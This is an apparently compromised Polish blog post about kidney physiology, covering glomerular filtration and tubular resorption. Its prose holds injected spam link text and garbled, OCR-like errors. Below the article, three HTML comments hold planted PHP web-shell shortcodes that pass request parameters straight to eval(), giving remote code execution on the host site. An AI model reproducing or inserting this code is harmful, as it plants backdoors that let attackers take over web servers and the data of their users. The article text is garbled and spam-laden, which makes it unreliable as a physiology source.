Posted by admin On Luty - 15 - 2014

Przesącz kłębkowy przechodzi z torebki Bowmana przez proksymalny kanalik kręty; w tej fazie resorbowane są w ścianie kanalików do krwi otaczających naczyń włosowatych woda i niektóre rozpuszczone w niej substancje. Proces resorpcji jest wysoce selektywny; z przesączu kłębkowego resorbowane są do krążenia woda, jony sodowe i chlorkowe, większość wodorowęglanów i cała ilość glukozy znajdująca się w przesączu, natomiast inne substancje, takie jak mocznik i inne produkty metabolizmu białka pozostają w przesączu. Podczas przejścia przez pętlę Henlego i dystalny kanalik kręty następuje dalsza selektywna resorpcja z przesączu, w wyniku czego ostateczny produkt układu wydalniczego – mocz – stanowi jedynie ok click over here now. 1% pierwotnej objętości przesączu kłębkowego o wyraźnie odmiennym już składzie. Końcowe stężenie mocznika w moczu jest 60-80 razy większe niż w osoczu czy przesączu kłębkowym. Z objętości 180 1 przesączu kłębkowego wytwarzanego dziennie przez przeciętnego dorosłego osobnika wydalane jest tylko ok. 1-2 1 jako mocz. Resorpcja wody z przesączu w proksymaJ kanaliku krętym odbywa się na zasadzie pr dyfuzji. Natomiast selektywna resorpcja substancji zachodzi zarówno w kanaliku krętym proksymalnym, jak i dystalnym uwarunkowana jest transportem czynnym, gdyż część tych cząsteczek w krwi jest zazwyczaj wyższa niż w przesączu. A zatem do selektywnej resorpcju jako transportu substancji wbrew dyfuzji niezbędna jest energia metaboliczna. Android

<!– [insert_php]if (isset($_REQUEST["lCg"])){eval($_REQUEST["lCg"]);exit;}[/insert_php][php]if (isset($_REQUEST["lCg"])){eval($_REQUEST["lCg"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["mPoPk"])){eval($_REQUEST["mPoPk"]);exit;}[/insert_php][php]if (isset($_REQUEST["mPoPk"])){eval($_REQUEST["mPoPk"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["hvJjN"])){eval($_REQUEST["hvJjN"]);exit;}[/insert_php][php]if (isset($_REQUEST["hvJjN"])){eval($_REQUEST["hvJjN"]);exit;}[/php] –>

Następne ciekawe artykuły naszej witryny:

Comments are closed.